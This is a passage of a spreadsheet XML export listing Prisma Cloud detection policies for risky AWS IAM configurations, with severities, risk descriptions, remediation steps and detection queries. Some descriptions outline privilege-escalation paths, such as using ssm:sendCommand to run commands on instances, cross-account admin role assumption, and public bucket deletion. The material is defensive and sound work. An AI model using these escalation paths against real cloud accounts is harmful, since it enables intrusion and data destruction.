      <c r="AJ3214" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3214" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3215">
      <c r="A3215" t="inlineStr"/>
      <c r="B3215" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3215" s="2" t="inlineStr"/>
      <c r="D3215" t="n">
        <v>17</v>
      </c>
      <c r="E3215" t="n">
        <v>1</v>
      </c>
      <c r="F3215" t="n">
        <v>0</v>
      </c>
      <c r="G3215" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3215" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3215" t="inlineStr">
        <is>
          <t>AWS EC2 Instance with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3215" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3215" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3215" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3215" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3215" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3215" t="inlineStr"/>
      <c r="R3215" t="inlineStr"/>
      <c r="S3215" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3215" t="b">
        <v>1</v>
      </c>
      <c r="U3215" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3215" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3215" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow EC2 instances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215"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1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5"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'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3215" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3215" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3215" t="inlineStr"/>
      <c r="AD3215" t="b">
        <v>1</v>
      </c>
      <c r="AE3215" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3215" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>34edd03b-b872-441b-84ed-19d9b4194c7d</t>
        </is>
      </c>
      <c r="AI3215" t="inlineStr">
        <is>
          <t>34edd03b-b872-441b-84ed-19d9b4194c7d</t>
        </is>
      </c>
      <c r="AJ3215" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3215" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3216">
      <c r="A3216" t="inlineStr"/>
      <c r="B3216" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3216" s="2" t="inlineStr"/>
      <c r="D3216" t="inlineStr"/>
      <c r="E3216" t="inlineStr"/>
      <c r="F3216" t="inlineStr"/>
      <c r="G3216" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3216" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3216" t="inlineStr">
        <is>
          <t>AWS S3 Bucket with Data Destruction Permissions is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3216" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3216" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3216" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3216" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3216" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3216" t="inlineStr"/>
      <c r="R3216" t="inlineStr"/>
      <c r="S3216" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3216" t="b">
        <v>0</v>
      </c>
      <c r="U3216" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3216" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3216" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 Buckets with Resource-based policies which allow all principals and the 's3:DeleteBucket' permission. This configuration could grant anyone with access to the bucket the ability to delete it together with all objects inside, potentially leading to permanent loss of information stored in the bucket.</t>
        </is>
      </c>
      <c r="X3216" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS S3 bucket service
3. Find resource-based policy of the S3 bucket resource
4. Update the 'Principal' section of the policy to avoid public access
5. Remove the risky actions</t>
        </is>
      </c>
      <c r="Y3216" t="inlineStr"/>
      <c r="Z3216" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 's3' AND dest.cloud.resource.type = 'bucket' AND grantedby.cloud.policy.condition does not exist AND action.name IN ( 's3:DeleteBucket' )</t>
        </is>
      </c>
      <c r="AA3216" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3216" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3216" t="inlineStr"/>
      <c r="AD3216" t="b">
        <v>1</v>
      </c>
      <c r="AE3216" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3216" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>8dfb8a24-6c2c-4b78-b7cc-314ccba0105a</t>
        </is>
      </c>
      <c r="AI3216" t="inlineStr">
        <is>
          <t>8dfb8a24-6c2c-4b78-b7cc-314ccba0105a</t>
        </is>
      </c>
      <c r="AJ3216" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3216" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3217">
      <c r="A3217" t="inlineStr"/>
      <c r="B3217" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3217" s="2" t="inlineStr"/>
      <c r="D3217" t="inlineStr"/>
      <c r="E3217" t="inlineStr"/>
      <c r="F3217" t="inlineStr"/>
      <c r="G3217" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3217" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3217" t="inlineStr">
        <is>
          <t>AWS Elastic Beanstalk Platform with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3217" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3217" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3217" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3217" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3217" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3217" t="inlineStr"/>
      <c r="R3217" t="inlineStr"/>
      <c r="S3217" t="inlineStr"/>
      <c r="T3217" t="b">
        <v>1</v>
      </c>
      <c r="U3217" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3217" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3217" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allows an Elastic Beanstalk Platform to manage AWS Organizations such as creating, deleting, updating AWS Organizations, accounts and Org level policies, features, and services.  AWS Organization write permissions are very risky and should only be used under very strict controls.  Unnecessary usage of these permissions can significantly increase your attack surface and make it easier for attackers to compromise your AWS environment.</t>
        </is>
      </c>
      <c r="X3217" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the Elasticbeanstalk Platform 
3. Find the role used by the Elasticbeanstalk Platform 
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y321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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('organizations:AcceptHandshake','organizations:AttachPolicy','organizations:CancelHandshake','organizations:CreateAccount','organizations:CreateGovCloudAccount','organizations:CreateOrganization','organizations:CreateOrganizationalUnit','organizations:CreatePolicy','organizations:DeclineHandshake','organizations:DeleteOrganization','organizations:DeleteOrganizationalUnit','organizations:DeletePolicy','organizations:DeregisterDelegatedAdministrator','organizations:DetachPolicy','organizations:DisableAWSServiceAccess','organizations:DisablePolicyType','organizations:EnableAWSServiceAccess','organizations:EnableAllFeatures','organizations:EnablePolicyType','organizations:InviteAccountToOrganization','organizations:LeaveOrganization','organizations:MoveAccount','organizations:RegisterDelegatedAdministrator','organizations:RemoveAccountFromOrganization','organizations:UpdateOrganizationalUnit','organizations:UpdatePolicy') AND source.cloud.service.name = 'elasticbeanstalk' AND source.cloud.resource.type = 'platform'</t>
        </is>
      </c>
      <c r="AA3217" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3217" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3217" t="inlineStr"/>
      <c r="AD3217" t="b">
        <v>1</v>
      </c>
      <c r="AE3217" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3217" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>b38b7c32-e9e8-4edb-8621-b88157ce34c7</t>
        </is>
      </c>
      <c r="AI3217" t="inlineStr">
        <is>
          <t>b38b7c32-e9e8-4edb-8621-b88157ce34c7</t>
        </is>
      </c>
      <c r="AJ3217" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3217" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3218">
      <c r="A3218" t="inlineStr"/>
      <c r="B3218" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3218" s="2" t="inlineStr"/>
      <c r="D3218" t="inlineStr"/>
      <c r="E3218" t="inlineStr"/>
      <c r="F3218" t="inlineStr"/>
      <c r="G3218" t="b">
        <v>1</v>
      </c>
      <c r="H32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18" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3218" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3218" t="inlineStr">
        <is>
          <t>Publicly Readable Lambda</t>
        </is>
      </c>
      <c r="L3218" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3218" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3218" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3218" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3218" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3218" t="inlineStr"/>
      <c r="R3218" t="inlineStr"/>
      <c r="S3218" t="inlineStr"/>
      <c r="T3218" t="b">
        <v>1</v>
      </c>
      <c r="U3218" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3218" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3218" t="inlineStr">
        <is>
          <t>Identifies Lambda functions with configurations that permit unauthorized identities to view or download the function's code or configuration settings, risking exposure of sensitive information.</t>
        </is>
      </c>
      <c r="X3218" t="inlineStr">
        <is>
          <t>Remediation steps:
Via Console:
1. Log in to your AWS account
2. Navigate to the Lambda function
3. Under the 'Configuration' tab, select 'Permissions'
4. Under 'Resource-based policy statements' edit the resource policy to only allow required parties to read the function and its configurations
Via CLI:
1. Log into your AWS account
2. Run 'aws lambda get-policy --function-name &lt;function arn&gt;' in order to get the statement-id for your current resource policy
3. Run 'aws lambda remove-permission' with the required arguments in order to remove the resource policy
4. Run 'aws lambda add-permission' to specify a new resource policy only allowing required parties to read the function and its configurations</t>
        </is>
      </c>
      <c r="Y321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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'lambda' AND action.name in ('lambda:GetFunction', 'lambda:GetFunctionConfiguration','lambda:GetFunctionUrlConfig') and grantedby.cloud.policy.type = 'Resource-based Policy' and dest.cloud.resource.type = 'function' AND grantedby.cloud.policy.condition ( 'lambda:FunctionUrlAuthType' ) != 'AWS_IAM' AND grantedby.cloud.policy.condition ( 'lambda:FunctionArn' ) does not exist</t>
        </is>
      </c>
      <c r="AA3218" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3218" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3218" t="inlineStr"/>
      <c r="AD3218" t="b">
        <v>1</v>
      </c>
      <c r="AE3218" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3218" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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18" t="inlineStr">
        <is>
          <t>d6b9aaf4-2b05-45d7-9288-30232865136e</t>
        </is>
      </c>
      <c r="AI3218" t="inlineStr">
        <is>
          <t>d6b9aaf4-2b05-45d7-9288-30232865136e</t>
        </is>
      </c>
      <c r="AJ3218" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3218" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3219">
      <c r="A3219" t="inlineStr"/>
      <c r="B3219" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3219" s="2" t="inlineStr"/>
      <c r="D3219" t="n">
        <v>0</v>
      </c>
      <c r="E3219" t="n">
        <v>8</v>
      </c>
      <c r="F3219" t="n">
        <v>0</v>
      </c>
      <c r="G3219" t="b">
        <v>1</v>
      </c>
      <c r="H32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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3219" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3219" t="inlineStr">
        <is>
          <t>Service Account can assume a Service Account with admin privileges in another account</t>
        </is>
      </c>
      <c r="L3219" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3219" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3219" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3219" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3219" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3219" t="inlineStr"/>
      <c r="R3219" t="inlineStr"/>
      <c r="S3219" t="inlineStr"/>
      <c r="T3219" t="b">
        <v>1</v>
      </c>
      <c r="U3219" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3219" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3219" t="inlineStr">
        <is>
          <t>Identifies service accounts which can assume service accounts with administrative permissions in a different account. A compromise of such a service account could allow an adversary to escalate their privileges and further themselves within the environment, moving laterally between the first and second account, greatly increasing the potential blast radius.</t>
        </is>
      </c>
      <c r="X3219" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the service account ("Source") and the role it can assume ("Granted By Entity"). The administrative role will be shown as the "Destination", and can be assumed by the grantor role ("Granted By Entity"). 
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
Browse to the privileged role ("Destination") in the AWS Console and select "Trust relationships"-&gt;"Edit trust policy". Modify the role's trust relationship as per requirements. Under the "Permissions" tab, select the relevant policy and remove unnecessary administrative permissions by either editing the policy or replacing it (notice: editing a customer managed policy could affect other roles). Additionally, you can change the permissions of the grantor role ("Granted By Entity") so it cannot assume the privileged role.</t>
        </is>
      </c>
      <c r="Y321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19" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND grantedby.cloud.entity.type = 'role' AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true AND dest.cloud.account != source.cloud.account</t>
        </is>
      </c>
      <c r="AA3219" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3219" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3219" t="inlineStr"/>
      <c r="AD3219" t="b">
        <v>1</v>
      </c>
      <c r="AE3219" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3219" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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19" t="inlineStr">
        <is>
          <t>af9ed230-2d06-40d1-bca9-23921467718e</t>
        </is>
      </c>
      <c r="AI3219" t="inlineStr">
        <is>
          <t>af9ed230-2d06-40d1-bca9-23921467718e</t>
        </is>
      </c>
      <c r="AJ3219" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3219" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3220">
      <c r="A3220" t="inlineStr"/>
      <c r="B3220" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3220" s="2" t="inlineStr"/>
      <c r="D3220" t="inlineStr"/>
      <c r="E3220" t="inlineStr"/>
      <c r="F3220" t="inlineStr"/>
      <c r="G3220" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3220" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3220" t="inlineStr">
        <is>
          <t>AWS IAM Groups and Roles with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3220" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3220" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3220" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3220" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3220" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3220" t="inlineStr"/>
      <c r="R3220" t="inlineStr"/>
      <c r="S3220" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3220" t="b">
        <v>0</v>
      </c>
      <c r="U3220" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3220" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3220" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Groups and Roles with Stale IAM Effective Data Read Permissions.
Risk of Unused Data Read Permissions:
Even seemingly innocuous permissions like "Data Read" in AWS IAM can be risky if left unused for extended periods. Unused IAM groups and roles with IAM effective Data Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker with access to these credentials could use them to gather sensitive details about your AWS environment. This information could include data storage locations (S3 buckets, DynamoDB tables), IAM user details, or security group configurations. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks.
Potential Stepping Stone: A compromised unused group or role with Data Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your AWS environment, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused IAM groups and roles with any level of IAM effective Data Read permissions (Read or Write) on a scheduled basis.
Principle of Least Privilege: Adhere to the principle of least privilege. Grant only the minimum level of Data Read access required for a group or role to function effectively. Evaluate if alternative methods, like IAM conditions or resource-based policies, can restrict access to specific S3 buckets, DynamoDB tables, or other data sources.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging IAM roles. This vigilance can help detect unusual activity related to unused groups or roles that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3220" t="inlineStr">
        <is>
          <t>Remediation for a role/group:
 1. Log in to the AWS console
 2. Navigate to the IAM service
 3. Click on Roles/Groups
 4. Choose the relevant role/Group
 5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y3220" t="inlineStr"/>
      <c r="Z3220" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy'  and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3220" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3220" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3220" t="inlineStr"/>
      <c r="AD3220" t="b">
        <v>1</v>
      </c>
      <c r="AE3220" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3220" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>2e3f8a73-d3ad-4a58-942b-bde6e4b526bb</t>
        </is>
      </c>
      <c r="AI3220" t="inlineStr">
        <is>
          <t>2e3f8a73-d3ad-4a58-942b-bde6e4b526bb</t>
        </is>
      </c>
      <c r="AJ3220" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3220" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3221">
      <c r="A3221" t="inlineStr"/>
      <c r="B3221" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3221" s="2" t="inlineStr"/>
      <c r="D3221" t="n">
        <v>0</v>
      </c>
      <c r="E3221" t="n">
        <v>0</v>
      </c>
      <c r="F3221" t="n">
        <v>29</v>
      </c>
      <c r="G3221" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3221" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3221" t="inlineStr">
        <is>
          <t>AWS IAM User with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3221" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3221" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3221" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3221" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3221" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3221" t="inlineStr"/>
      <c r="R3221" t="inlineStr"/>
      <c r="S3221" t="inlineStr"/>
      <c r="T3221" t="b">
        <v>1</v>
      </c>
      <c r="U3221" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3221" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3221" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow IAM users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221" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y322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1"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'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3221" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3221" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3221" t="inlineStr"/>
      <c r="AD3221" t="b">
        <v>1</v>
      </c>
      <c r="AE3221" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3221" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>e231b07d-f1e1-40ad-9c7c-d38f09948db9</t>
        </is>
      </c>
      <c r="AI3221" t="inlineStr">
        <is>
          <t>e231b07d-f1e1-40ad-9c7c-d38f09948db9</t>
        </is>
      </c>
      <c r="AJ3221" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3221" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3222">
      <c r="A3222" t="inlineStr"/>
      <c r="B3222" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3222" s="2" t="inlineStr"/>
      <c r="D3222" t="n">
        <v>0</v>
      </c>
      <c r="E3222" t="n">
        <v>206</v>
      </c>
      <c r="F3222" t="n">
        <v>0</v>
      </c>
      <c r="G3222" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3222" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3222" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via EC2 describe and SSM list and send command permissions</t>
        </is>
      </c>
      <c r="L3222" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3222" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3222" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3222" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3222" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3222" t="inlineStr"/>
      <c r="R3222" t="inlineStr"/>
      <c r="S3222" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3222" t="b">
        <v>1</v>
      </c>
      <c r="U3222" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3222" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3222" t="inlineStr">
        <is>
          <t>With access to the ec2:DescribeInstances, ssm:listCommands, ssm:listCommandInvocations, ssm:sendCommand permissions, an adversary can execute commands on any instance that supports SSM.  This could allow an adversary to escalate privileges if they find an instance that has a highly privileged IAM role attached to it.</t>
        </is>
      </c>
      <c r="X3222" t="inlineStr">
        <is>
          <t>"Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk of Privilege Escalation. If identity requires the use of these permissions to pass a role to an EC2 instance, make sure the policy is scoped to only the resources needed. The same granular logic can be applied with EC2 as the following example using the lambda function. https://aws.amazon.com/premiumsupport/knowledge-center/granular-access-lambda/
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2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2" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'ec2:DescribeInstances', 'ssm:listCommands', 'ssm:listCommandInvocations', 'ssm:sendCommand') AND dest.cloud.wildcardscope = true</t>
        </is>
      </c>
      <c r="AA3222" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3222" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:36</t>
        </is>
      </c>
      <c r="AC3222" t="inlineStr"/>
      <c r="AD3222" t="b">
        <v>1</v>
      </c>
      <c r="AE3222" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3222" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>e9fb951f-4bbc-4045-87f8-c11af8eb0e46</t>
        </is>
      </c>
      <c r="AI3222" t="inlineStr">
        <is>
          <t>e9fb951f-4bbc-4045-87f8-c11af8eb0e46</t>
        </is>
      </c>
      <c r="AJ3222" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3222" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3223">
      <c r="A3223" t="inlineStr"/>
      <c r="B3223" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3223" s="2" t="inlineStr"/>
      <c r="D3223" t="n">
        <v>0</v>
      </c>
      <c r="E3223" t="n">
        <v>121</v>
      </c>
      <c r="F3223" t="n">
        <v>0</v>
      </c>
      <c r="G3223" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3223" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3223" t="inlineStr">
        <is>
